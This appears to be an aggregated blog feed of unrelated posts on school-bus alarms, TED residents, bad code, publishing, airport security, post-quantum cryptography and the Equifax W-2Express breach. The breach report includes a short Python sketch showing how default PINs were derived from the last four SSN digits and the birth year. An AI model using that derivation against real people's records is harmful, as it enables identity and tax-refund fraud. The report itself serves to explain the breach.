What comes to mind when you think about alarms? Annoying. Loud. Harsh. Maybe even scary. A school bus driver would want to turn off that alarm ASAP, not just because it annoys the driver, but because it can literally cause pain to every student with even a little auditory sensitivity.

So here's the likely scenario.
1. Driver parks bus.
2. Driver turns off engine, triggering alarm.
3. Driver turns off alarm.
4. Driver helps children off bus.

Notice the order that happens in? The alarm isn't going to force the driver to check for children left in the bus. The driver will turn off the alarm, and THEN get the children off, because the alarm is annoying. There will be no enforced checking of seats, just an extra step to distract the driver from the passengers.

Does it really take a human factors degree to understand this? People behave in predictable ways. We're trained to respond to alarms, and this alarm would train the driver to respond by turning it off as soon as possible. Even if the driver insists on leaving the alarm blaring until the bus is empty, that's just going to torture any auditory-sensitive children on the bus which, since this is a special-needs bus, is going to be quite a few of them.

Don't get me wrong; I'm firmly against par-boiling autistics in school buses. I just don't think this is a good way to prevent it. There have to be better ways.

Anything that required the driver to physically touch every seat after the children left would be adequate. Require the driver to re-buckle seat belts, put up hand rests, anything that's easier to do after the children leave the bus. Doesn't matter what it is, though it can probably also function as leaving the bus in an orderly state. Alarms, though... I don't see how they would even help.

TEDMeet our first class of TED Residents


An idea worth spreading doesn’t just magically appear out of thin air. Instead, it needs a long incubation period, a sometimes frustrating — and often exciting — trial and error of creation, failure and innovation.

On April 18, TED welcomed its first-ever class of the TED Residency program, an in-house community of 28 bright minds who are tackling ambitious projects and making meaningful change.

This group of thinkers will spend the next four months in a collaborative space, learning with and from each other on ideas that address …

  • How to explain complex scientific concepts
  • The personal stories of migrants
  • Violence prevention in at-risk communities
  • How to make the most of personal connections in a tech-heavy world
  • The history of the Internet
  • Inclusion in the fashion world
  • Building the digital Disney of Africa
  • Frictionless housing for a mobile society

… among many other fascinating subjects.

At the end of the session, the residents will give a TED Talk about their ideas in the TED office theater. Read more about each resident below:

Daniel Ahmadizadeh is working with artificial intelligence to revolutionize how consumers are informed and make choices. He co-founded Riley, a chatbot concierge service for the real-estate business.

Piper Anderson is a writer and creative strategist who has spent the past 15 years working to end mass criminalization and incarceration. She recently launched the National Mass Story Campaign, which will host participatory storytelling events in 20 cities to catalyze more restorative and transformative approaches to justice.

Isabel Behncke is an Oxford field primatologist from Chile who is working on the evolutionary roots of social behavior in humans and other animals. She is creating a show on the science of joy that blurs boundaries among theater, poetry and cutting-edge science.

Susan Bird is CEO of Wf360, a global consultancy that promotes conversation not as a “soft skill,” but as a strategic tool. She is developing a podcast about the art of face-to-face conversation, which has become something of a luxury in this age of electronic communication.

Artist and traveler Reggie Black started Sticky Inspiration as an online project designed to motivate others through thought-provoking quotes distributed daily on Post-Its left in public spaces. Now he’s ready to expand offline.

Sashko Danylenko is a Ukraine-based filmmaker whose animated films explore wonder and curiosity. Currently, he’s working on a film that documents cities around the world by focusing on their bicyclists.

Tanya Dwyer is an attorney and social entrepreneur in Brooklyn who works to promote inclusive capitalism and economic justice. She wants to help establish a living-wage business park in Crown Heights that is cooperatively owned by neighborhood residents and stakeholders.

Laura Anne Edwards is building DATA OASIS, a dynamic index of valuable data sets, many of which are taxpayer-funded and technically “open” but in practice extremely difficult to locate and access. DATA OASIS will reduce redundant research and provide a forum for idea sharing.

Rob Gore, an academic emergency medicine physician based in Brooklyn, leads KAVI (Kings Against Violence Initiative), a youth empowerment and violence prevention program that has been running for the past five years. He is working to transform health care in marginalized populations.

Che Grayson is a filmmaker and comic book creator whose multimedia project Rigamo, a comic series and short film about a young girl whose tears bring people back to life, helped her overcome her grief at the death of a beloved aunt. She wants to explore using these forms of storytelling to tackle other tough subjects, heal, and inspire.

Bethany Halbreich runs Paint the World, an organization that wants to make opportunities for creativity ubiquitous. Paint the World facilitates public art projects in underserved communities; the resulting pieces are sold, and the profits fund more kits and supplies for areas in need.

Sarah Hinawi is the co-founder and director of Purpl, a small-business incubator that focuses on the person rather than the business. Building upon two decades in the field of human development, she is now examining what leadership training looks like in the gig economy.

Designer and writer DK Holland has spent the past two and a half years in high-poverty public elementary school classrooms in Brooklyn, developing free after-school micro-democracies run by the kids, for kids, so they can learn better. She is working with her team of progressive educators to develop the kids’ ideas into  toolkits—notably the Learning Wall, Portfolio Pockets, and Democracy in a Box—to offer to other schools.

Liz Jackson is the founder and chief advocacy officer for the Inclusive Fashion & Design Collective, the first fashion trade association for businesses and designers serving the needs of people with disabilities. Her mission is to introduce the world to inclusive design.

Ayana Elizabeth Johnson is a marine biologist and policy expert who advocates zoning the ocean as we do land, so we can use the sea without using it up. As executive director of the Waitt Institute, she led the Caribbean’s first successful island-wide ocean zoning project, resulting in one third of Barbuda’s coastal waters being protected, and went on to launch similar initiatives on other islands. 

Jonathan Kalan and Michael Youngblood want to redefine the notion of home and its relation to work. Designed for millennials who care more about mobility than about owning real estate, their “global lease” aims to let subscribers stay “location-independent.”

Brian McCullough is the creator of the Internet History Podcast, an oral history of the internet; he’s now telling the stories of Web 2.0. 

Christia Mercer is a full-time Columbia philosophy professor and part-time activist. She plans to examine radically different answers to hard questions that people have given throughout history and across cultures and then to show their relevance to modern thinking.

Ted Myerson is a co-founder of Anonos, a Big Privacy technology company that enables data to be more readily collected, shared, and combined, potentially enabling breakthroughs in personalized and precision medicine. 

As a tap dancer, Andrew Nemr has lived the oral tradition of American Vernacular Dance. Cofounder (with the late, great Gregory Hines) of the Tap Legacy Foundation, he is now working to transfer that archive online. 

Cavaughn Noel is an experienced digital strategist and tech entrepreneur who is broadening the horizons of urban youth by creating a platform that exposes them to technology, via hip-hop, fashion, and travel.

Torin Perez is building a digital platform for sharing children’s stories from Africa and the diaspora. The DreamAfrica app contains multimedia content from established publishers, independent content creators, and children.

Amanda Phingbodhipakkiya is a Columbia-trained neuroscientist turned art director. Her organization recruits designers and researchers to collaborate on visual media that demystify academic science.

After her Flappy Bird in a Box video went viral, Fawn Qiu wondered how else she could hook teens on engineering. By creating an open-source model for designing fun projects with low-cost, everyday objects, she hopes to encourage a new generation of engineers.

Vanessa Valenti is the co-founder of FRESH, a next-generation speakers’ bureau focused on diversifying public speaking. She’s studying who gets on the world’s most influential stages and what their experiences are once they get there. Her goal is to redesign thought leadership.

Kimberlee Williams is the CEO of FEMWORKS, a communications agency based in Newark, NJ.  She wants to transform local economies by enrolling African-American consumers in buy-local campaigns.

Sheryl Winarick’s work as an immigration lawyer gives her a unique opportunity to know intimately the people she serves, the reasons they choose to migrate, and the challenges they face. She aims to create an online storytelling platform to humanize “the other,” and to cultivate a sense of individual and collective responsibility.


Worse Than FailureAnnouncements: Code Offsets - Version 2.0

The Daily WTF exists to point out coding horrors, but a few years ago we also took a swing at trying to prevent bad code. Longtime readers might remember our 2009 initiative, Code Offsets. We are pleased to announce that Code Offsets are back, redesigned, and ready for you to make a difference (or just to make fun of your coworkers).

Babbage Offset

Essentially, the idea is simple. Code Offsets are a novel way to offset your (or your co-workers') crap code. Just as carbon offsets compensate for emissions of carbon dioxide and other greenhouse gases produced elsewhere, Code Offsets are used to offset the bad code that already exists.

When you purchase a pack of Code Offsets, the proceeds go to a featured nonprofit group that helps promote good code through education, donations, or open source software.

At launch that organization is TECH CORPS. They are an amazing nonprofit organization dedicated to ensuring K-12 students have equal access to technology programs, skills and resources that enhance early learning and prepare them for college and career.

The Code Offsets themselves are bills that feature some of the most notable characters from the history of computing, the founders of the discipline from Babbage to Hopper.

Offsets

We’ve designed nine different bills, each offsetting a select amount of bad code. The bills available range from one line, all the way up to one thousand lines. They come in packs so you can keep a few for yourself, but still pass some out to any Paulas around the office.

Also, to celebrate the release of the project, we printed up some stickers for the first 1000 orders! (Mainly because Alex loves stickers.)

[Advertisement] Infrastructure as Code built from the start with first-class Windows functionality and an intuitive, visual user interface. Download Otter today!

CryptogramChildren of Spies

Fascinating story of Tim and Alex Foley, the children of Russian spies Donald Heathfield and Tracey Foley.

Worse Than FailureCoded Smorgasbord: Finding a Path

Readers of TDWTF know all too well that dates are hard. Strings are also hard. You know what else is hard? File paths.

Like dates, and strings, most languages these days have libraries to simplify parsing filepaths. For example, in Python, you can use the os.path module to parse out the directory structure, the file, and its extension without too much effort.
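
A minimal sketch of that built-in route, for reference (the path below is hypothetical, not taken from the submitted code):

import os.path

path = "/srv/intFiles/sample42/report.txt"    # hypothetical example path
directory, filename = os.path.split(path)     # '/srv/intFiles/sample42', 'report.txt'
name, extension = os.path.splitext(filename)  # 'report', '.txt'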

As Chris discovered, though, some people like that effort. Why use things like os.path when you’ve got Python’s super-powered slice operator for splitting the string apart:

samp = file[file.find('intFiles')+9:].split("/")[0]
fName = file.split("/")[-1]

The second line is the one that pulls off the file name- split into an array, grab the last element- and it’ll work fine, if not efficiently.

By the same token, the preceding line isn’t wrong; it’s just ugly. It finds the starting point of the string “intFiles” in the filename, jumps just past it, and then splits on slashes, grabbing the first item. And frankly, what would we have rather the original developer used? A built-in function?

It’s ugly, but not the worst sin. What if we started with a language that was already ugly? What about Objective-C? Objective-C, especially when used on MacOS or iOS, is an ugly beast that mixes high-level abstractions with low-level APIs, and stubbornly insists on using Smalltalk-style message passing for calling methods of objects.

Paul’s team-mate needed to find the file name from the path. There’s a lovely built-in function called lastPathComponent that makes this easy, but again- Paul’s team-mate wasn’t interested in easy.

+ (__strong NSString*) getFilename: (NSString*) file
{
    NSString* Result = @"";
    @try
    {
        if ( [mbUtilis hasContent: file ] )
        {
            Result = file;

            for ( NSInteger i = [file length] -1; i >= 0; i--)
            {
                UniChar c = [file characterAtIndex: i];
                if ( c == '/' )
                {
                    if ( i != [file length] -1 )
                    {
                        Result = [file substringFromIndex: i +1];
                    }

                    break;
                }
            }
        }
    }
    @catch (NSException *e)
    {
        [mbApi logException: @"mbUtilis.getFilename" exception: e];
    }
    @finally
    {
        // TODO
    }

    return Result;
}

This, at least, does a reverse search, walking the string backwards until it finds a slash, then chopping off everything up to and including that slash and stuffing the remainder into Result. The part that gets me isn’t the path manipulation. It’s the control flow: why not just return the result from inside the for loop? Why break, fall through, and funnel everything through a single return Result at the end?

Those two examples are both clear cases of ignorance-of-built-ins, and they’re a little sloppy and perhaps a bit more cryptic than necessary, but hey, at least they’re not using regular expressions.

Speaking of regular expressions, normally, we think of a person’s name as an arbitrary string. There are too many edge cases, too many unexpected characters, too many cultural differences to have a simple rule that says, “This is what a valid name looks like”.

Stefan’s co-worker didn’t like that line of thought. They wrote a set of regexes that gradually grew to account for more and more exceptions.

    public final static Pattern Lastname = Pattern.compile("^[\\pL]+[\\.\\']?((\\-| )*[,\\pL]+[\\.]?)*$");
    public final static Pattern Firstname = Pattern.compile("^[\\pL]+[\\.]?((\\-| )[\\pL]+[\\.]?)*$");
    public final static Pattern AcademicTitle = Pattern.compile("^[\\pL]+[\\.]?((\\-| )[\\pL]+[\\.]?)*$");

These validations were used to process a bulk-upload of customer data. When a single record failed validation, it wouldn’t be saved- and all of the following records would fail silently. This created a number of messes.
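
The general trap is easy to reproduce. Here is a minimal sketch using a deliberately naive, hypothetical pattern (much simpler than the ones above, which at least used Unicode letter classes), just to show how quickly ordinary names fall outside any rule for “what a valid name looks like”:

import re

# Hypothetical, deliberately simplified "valid name" rule -- not the original pattern.
NAME = re.compile(r"^[A-Za-z]+[.']?((-| )[A-Za-z]+\.?)*$")

for name in ["Smith", "O'Brien", "Müller", "de la Cruz", "Nguyễn"]:
    print(name, "valid" if NAME.match(name) else "rejected")

Each rejected name prompts another tweak to the pattern, which is exactly how a regex like the ones above gradually grows.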

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Cory DoctorowPeace in Our Time: how publishers, libraries and writers could work together


Publishing is in a weird place: ebook sales are stagnating; the industry has consolidated down to five major publishers; libraries and publishers are at each other’s throats over ebook pricing; major writers’ groups are up in arms over ebook royalties; and, of course, we only have one major book retailer left — what is to be done?


In my new Locus Magazine column, “Peace in Our Time,” I propose a pair of software projects that could bring together writers, publishers and libraries to increase competition, give publishers the market intelligence they need to sell more books, triple writers’ ebook royalties, and sell more ebooks to libraries, on much fairer terms.

The first project is a free/open version of Overdrive, the software that publishers insist that libraries use for ebook circulation. A free/open version, collectively created and maintained by the library community, would create a source of data that publishers could use to compete with Amazon, their biggest frenemy, while still protecting patron privacy. The publishers’ quid-pro-quo for this data would be an end to the practice of gouging libraries on ebook prices, leaving them with more capital to buy more books.

The second project is a federated ebook store for writers, that would allow writers to act as retailers for their publishers, selling their own books and keeping the retailer’s share in addition to their traditional royalty: a move that would increase the writer’s share by 300%, without costing the publishers a penny. Writer-operated ebook stores, spread all over the Web but searchable from central portals, do not violate the publishers’ agreements with Amazon, but they do create a new sales category: “fair trade ebooks,” whose sale gives the writers you love the money to feed their families and write more books — without costing you anything extra.
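
For a rough sense of the arithmetic, here is a back-of-the-envelope sketch using commonly cited industry figures (my own assumptions, not numbers taken from the column): retailers keep roughly 30% of the list price, and a standard ebook royalty runs around 25% of the publisher's net receipts.

list_price = 10.00                            # assumed list price
retailer_share = 0.30 * list_price            # ~$3.00 normally kept by the retailer
publisher_net = list_price - retailer_share   # ~$7.00 to the publisher
standard_royalty = 0.25 * publisher_net       # ~$1.75 to the writer today

# If the writer is also the retailer, they keep both pieces.
writer_as_retailer = standard_royalty + retailer_share
print(round(writer_as_retailer / standard_royalty, 1))  # ~2.7x, i.e. roughly triple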

Amazon knows, in realtime, how publishers’ books are performing. It knows who is buying them, where they’re buying them, where they’re reading them, what they searched for before buying them, what other books they buy at the same time, what books they buy before and after, whether they read them, how fast they read them, and whether they finish them.

Amazon discloses almost none of this to the publishers, and what information they do disclose to the publishers (the sales data for the publishers’ own books, atomized, without data-mineable associations) they disclose after 30 days, or 90 days, or 180 days. Publishers try to fill in the gaps by buying their own data back from the remaining print booksellers, through subscriptions to point-of-sale databases that have limited relevance to e-book performance.

There is only one database of e-book data that is remotely comparable to the data that Amazon mines to stay ahead of the publishers: e-book circulation data from public libraries. This data is not as deep as Amazon’s – thankfully, since it’s creepy and terrible that Amazon knows about your reading habits in all this depth, and it’s right and fitting that libraries have refused to turn on that kind of surveillance for their own e-book circulation.

Peace in Our Time [Cory Doctorow/Locus]

,

CryptogramEconomist Detained for Doing Math on an Airplane

An economics professor was detained when he was spotted doing math on an airplane:

On Thursday evening, a 40-year-old man -- with dark, curly hair, olive skin and an exotic foreign accent -- boarded a plane. It was a regional jet making a short, uneventful hop from Philadelphia to nearby Syracuse.

Or so dozens of unsuspecting passengers thought.

The curly-haired man tried to keep to himself, intently if inscrutably scribbling on a notepad he'd brought aboard. His seatmate, a blond-haired, 30-something woman sporting flip-flops and a red tote bag, looked him over. He was wearing navy Diesel jeans and a red Lacoste sweater -- a look he would later describe as "simple elegance" -- but something about him didn't seem right to her.

She decided to try out some small talk.

Is Syracuse home? She asked.

No, he replied curtly.

He similarly deflected further questions. He appeared laser-focused ­-- perhaps too laser-focused ­-- on the task at hand, those strange scribblings.

Rebuffed, the woman began reading her book. Or pretending to read, anyway. Shortly after boarding had finished, she flagged down a flight attendant and handed that crew-member a note of her own.

This story ended better than some. Economics professor Guido Menzio (yes, he's Italian) was taken off the plane, questioned, cleared, and allowed to board with the rest of the passengers two hours later.

This is a result of our stupid "see something, say something" culture. As I repeatedly say: "If you ask amateurs to act as front-line security personnel, you shouldn't be surprised when you get amateur security."

On the other hand, "Algebra, of course, does have Arabic origins plus math is used to make bombs." Plus, this fine joke from 2003:

At Heathrow Airport today, an individual, later discovered to be a school teacher, was arrested trying to board a flight while in possession of a compass, a protractor, and a graphical calculator.

Authorities believe she is a member of the notorious al-Gebra movement. She is being charged with carrying weapons of math instruction.

AP story. Slashdot thread.

Seriously, though, I worry that this kind of thing will happen to me. I'm older, and I'm not very Semitic looking, but I am curt to my seatmates and intently focused on what I am doing -- which sometimes involves looking at web pages about, and writing about, security and terrorism. I'm sure I'm vaguely suspicious.

EDITED TO ADD: Last month a student was removed from an airplane for speaking Arabic.

Sociological ImagesThe Invisible Worry Work of Mothering

Way back in 1996 sociologist Susan Walzer published a research article pointing to one of the more insidious gender gaps in household labor: thinking. It was called “Thinking about the Baby.”

In it, Walzer argued that women do more of the intellectual and emotional work of childcare and household maintenance. They do more of the learning and information processing (like buying and reading “how-to” books about parenting or researching pediatricians). They do more worrying (like wondering if their child is hitting his developmental milestones or has enough friends at school). And they do more organizing and delegating (like deciding when towels need washing or what needs to be purchased at the grocery store), even when their partner “helps out” by accepting assigned chores.

For Mother’s Day, a parenting blogger named Ellen Seidman powerfully describes this exhausting and almost entirely invisible job. I am compelled to share. Her essay centers on the phrase “I am the person who notices…” It starts with the toilet paper running out and it goes on… and on… and on… and on. Read it.

She doesn’t politicize what she calls an “uncanny ability to see things… [that enable] our family to basically exist.” She defends her husband (which is fine) and instead relies on a “reduction to personality,” that technique of dismissing unequal workloads first described in the canonical book The Second Shift: somehow it just so happens that it’s her and not her husband that notices all these things.

But I’ll politicize it. The data suggests that it is not an accident that it is she and not her husband that does this vital and brain-engrossing job. Nor is it an accident that it is a job that gets almost no recognition and entirely no pay. It’s work women disproportionately do all over America. So, read it. Read it and remember to be thankful for whoever it is in your life that does these things. Or, if it is you, feel righteous and demand a little more recognition and burden sharing. Not on Mother’s Day. That’s just one day. Every day.

Lisa Wade is a professor at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. Find her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

CryptogramNIST Starts Planning for Post-Quantum Cryptography

Last year, the NSA announced its plans for transitioning to cryptography that is resistant to a quantum computer. Now, it's NIST's turn. Its just-released report talks about the importance of algorithm agility and quantum resistance. Sometime soon, it's going to have a competition for quantum-resistant public-key algorithms:

Creating those newer, safer algorithms is the longer-term goal, Moody says. A key part of this effort will be an open collaboration with the public, which will be invited to devise and vet cryptographic methods that -- to the best of experts' knowledge -- will be resistant to quantum attack. NIST plans to launch this collaboration formally sometime in the next few months, but in general, Moody says it will resemble past competitions such as the one for developing the SHA-3 hash algorithm, used in part for authenticating digital messages.

"It will be a long process involving public vetting of quantum-resistant algorithms," Moody said. "And we're not expecting to have just one winner. There are several systems in use that could be broken by a quantum computer­ -- public-key encryption and digital signatures, to take two examples­ -- and we will need different solutions for each of those systems."

The report rightly states that we're okay in the symmetric cryptography world; the key lengths are long enough.

This is an excellent development. NIST has done an excellent job with their previous cryptographic standards, giving us a couple of good, strong, well-reviewed, and patent-free algorithms. I have no doubt this process will be equally excellent. (If NIST is keeping a list, aside from post-quantum public-key algorithms, I would like to see competitions for a larger-block-size block cipher and a super-fast stream cipher as well.)

Two news articles.

Worse Than FailureThat 70's Paper Mill

The late Seventies were a lucrative time for Finland-based Kirkniemi Paperi, a paper production powerhouse. Puoval had a great opportunity to cash in on the profits by helping to integrate a completely automated, computer-based production system. His degree in electronic engineering was finally going to pay off.

Thanks to the invention of the Intel 8085 microprocessor, it became possible to turn trees into paper quicker than ever. Puoval had a mandate from Kirkniemi ownership to spare no expense in getting the system up and running, since their biggest competitor had implemented a similar system the year before. But if they had a bumpy rollout, it would be incredibly damaging to both the company and Puoval's livelihood.

Painting of paper-making at Hahnemühle

The system would have to control paper machines more than a hundred meters long, capable of moving paper through them at 80 kilometers per hour (which would make for one wicked paper cut). While they were literally well-oiled machines, a small problem in any part of the production would bring everything to a halt, since it was all interconnected. When paper-making stops, moneymaking stops and the bosses get angry.

Despite the risk, Puoval was up to the task. He drooled over the hardware he was allowed to bring in to be the brains of the operation. He got to set up a whole army of blazing-fast 6 MHz Intel 8085s, cages full of in-house-built Eurocard logic boards, analog and digital sensors, kilobytes of tight machine code, the whole works. As a fail-safe, Puoval even set up a battery backup system and line conditioning to prevent a power surge from frying his masterpiece.

It was a long and difficult setup process, but Puoval's brainchild sparked to life and, amazingly, worked as intended right away. The output of the paper mill increased 40% and Puoval's bank account increased 100%. For over a year, it hummed along flawlessly cranking out gloriously large rolls of paper. But then, this feel-good story got beat to a pulp.

Late one night around 11 PM, Puoval's phone rang. On the other end was the panicked 2nd shift manager of the mill. "Puoval! Are you still awake? GOOD! We need you in here ASAP! THE SYSTEM IS DOWN!"

"What do you mean it's down?" Puoval asked back through growing sleepiness.

"Well, the machines were running just fine, then out of nowhere, they just shut off and ground to a halt. Paper went flying off the rolls all over the place. It's like a gang of mummies exploded in here!"

"Ok, I'll get dressed and be in as soon as I can," Puoval sighed, unsure what to expect upon his arrival.

While the 2nd shift line technicians cleaned up the paper disaster, Puoval headed for his control system. He half expected to see it charred and smoking, but everything looked fine. He ran some system diagnostics and nothing looked out of the ordinary other than the sudden cutoff in the logs when everything stopped. He began the lengthy startup process of the system and machines and the mill was back in action.

When the bosses caught wind of the unexplained failure in the morning, Puoval was put on notice that it could not happen again. "Understood. I'm going to give everything a thorough inspection today, and stay late to make sure nothing weird is happening during 2nd shift," he assured the powers-that-be.

Midnight rolled around and everything was still humming along. Puoval decided to head home but made it clear to the manager to call him immediately if even the slightest thing went wrong. Fortunately nothing went wrong that night. Or the next night. Puoval was ready to chalk it up to a one-time freak occurrence. But the 3rd night his phone rang around 11 PM again. "PUOVAL! WE NEED YOU NOW!"

Puoval came in to find the same situation as three nights before. He got everything running again but in the morning the bosses demanded he work both 1st and 2nd shift every day until he had an answer. Two late nights came to pass without a hitch. But when the dreaded 3rd night arrived, he was on high alert. The clock ticked towards 11 PM and he began to sweat. Nothing could go wrong though, as he was watching his beloved system like a hawk.

Just as he was sure nothing would go wrong this day, an innocent-looking cleaning lady strolled up pushing a large commercial vacuum cleaner. He watched her ignore the multiple signs around the cage of his computers that said "DO NOT USE THESE OUTLETS, EVER!" and begin to plug in her vacuum. Puoval sprang at her, shouting to stop.

Not expecting his rapid advance, she had a look of dread come across her face. "But I need to clean?"

"Absolutely not! Not right here! You will bring this whole plant to its knees!" Puoval warned. Upon further explanation, the cleaning lady's behemoth vacuum was a new addition to the fleet. The smaller, economical one didn't draw enough juice to take Puoval's system down. Once this beast was plugged in to the forbidden outlet, which happened to be past the line conditioners, everything came crashing down. At least Puoval found his explanation, albeit a ridiculous one, so that he may retire from 2nd shift.

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

,

Krebs on SecurityCrooks Grab W-2s from Credit Bureau Equifax

Identity thieves stole tax and salary data from big-three credit bureau Equifax Inc., according to a letter that grocery giant Kroger sent to all current and some former employees on Thursday. The nation’s largest grocery chain by revenue appears to be one of several Equifax customers that were similarly victimized this year.

Atlanta-based Equifax’s W-2Express site makes electronic W-2 forms accessible for download for many companies, including Kroger — which employs more than 431,000 people. According to a letter Kroger sent to employees dated May 5, thieves were able to access W-2 data merely by entering an employee’s default PIN code at Equifax’s portal; that default was nothing more than the last four digits of the employee’s Social Security number and their four-digit birth year.
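
In other words, the “authenticator” was entirely derivable from data the thieves already held. A minimal sketch of the scheme as described in Kroger’s letter (the function, the sample person, and the exact concatenation order are my illustration, not Equifax’s actual code):

def default_pin(ssn: str, birth_year: int) -> str:
    # Last four digits of the SSN followed by the four-digit birth year,
    # per the format described in the Kroger letter (order assumed).
    return ssn.replace("-", "")[-4:] + str(birth_year)

print(default_pin("123-45-6789", 1975))  # hypothetical person -> "67891975"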

“It appears that unknown individuals have accessed [Equifax’s] W2Express website using default log-in information based on Social Security numbers (SSN) and dates of birth, which we believe were obtained from some other source, such as a prior data breach at other institutions,” Kroger wrote in a FAQ about the incident that was included with the letter sent to employees. “We have no indication that Kroger’s systems have been compromised.”

The FAQ continued:

“At this time, we have no indication that associates who had created a new password (did not use the default PIN) were affected, and we are still identifying which associates still using the default PIN may have been affected. We believe individuals gained access to some Kroger associates’ electronic W-2 forms and may have used the information to file tax returns in their names in an effort to claim a fraudulent refund.”

“Kroger is working with Equifax and the authorities to determine who is affected and restore secure access to W-2Express. At this time, we believe you are among our current and former Kroger associates using the default PIN in the W-2Express system. This does not necessarily mean your W-2 was accessed as part of this security incident. We are still working to identify which individuals’ information was accessed.”

Kroger said it doesn’t yet know how many of its employees may have been affected.

The incident comes amid news first reported on this blog earlier this week that tax fraudsters similarly targeted employees of companies that used payroll giant ADP to give employees access to their W-2 data. ADP acknowledged that the incident affected employees at U.S. Bank and at least 11 other companies.

Equifax did not respond to requests for comment about how many other customer companies may have been affected by the same default (in)security. But Kroger spokesman Keith Dailey said other companies that relied on Equifax for W-2 data also relied on the last four of the SSN and 4-digit birth year as authenticators.

“As far as I know, it’s the standard Equifax setup,” Dailey said.

Last month, Stanford University alerted 600 current and former employees that their data was similarly accessed by ID thieves via Equifax’s W-2Express portal. Northwestern University also just alerted 150 employees that their salary and tax data was stolen via Equifax this year.

In a statement released to KrebsOnSecurity, Equifax spokeswoman Dianne Bernez confirmed that the company had been made aware of suspected fraudulent access to payroll information through its W-2Express service by Kroger.

“The information in question was accessed by unauthorized individuals who were able to gain access by using users’ personally identifiable information,” the statement reads. “We have no reason to believe the personally identifiable information was attained through Equifax systems. Unfortunately, as individuals’ personally identifiable information has become more publicly available, these types of online fraud incidents have escalated. As a result, it is critical for consumers and businesses to take steps to protect consumers’ personally identifiable information including the use of strong passwords and PIN codes. We are working closely with Kroger to assess and monitor the situation.”

ID thieves go after W-2 data because it contains much of the information needed to fraudulently request a large tax refund from the IRS in someone else’s name. Kroger told employees they would know they were victims in this breach if they received a notice from the IRS about a fraudulent refund request filed in their name.

However, most victims first learn of the crime after having their returns rejected by the IRS because the scammers beat them to it. Even those who are not required to file a return can be victims of refund fraud, as can those who are not actually due a refund from the IRS.

Kroger said it would offer free credit monitoring services to employees affected by the breach. Kroger spokesman Dailey declined to say which company would be providing that monitoring, but he did confirm that it would not be Equifax.

Update, May 7, 9:44 a.m.: Added mention of the Northwestern University incident involving Equifax’s W-2 portal.

Rondam RamblingsJust two little problems...

Donald Trump today tweeted "Happy Cinco de Mayo! The best taco bowls are made in Trump Tower Grill. I love Hispanics!" But there are two little problems (apart from the fact that he thinks Latinos are all drug dealers and rapists).  Take a look at the photo: That photo could not have been taken in the Trump Tower.  See those trees in the window?  The Trump Tower is on Fifth Avenue between

CryptogramFriday Squid Blogging: Firefly Squid in the News

It's a good time to see firefly squid in Japan.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.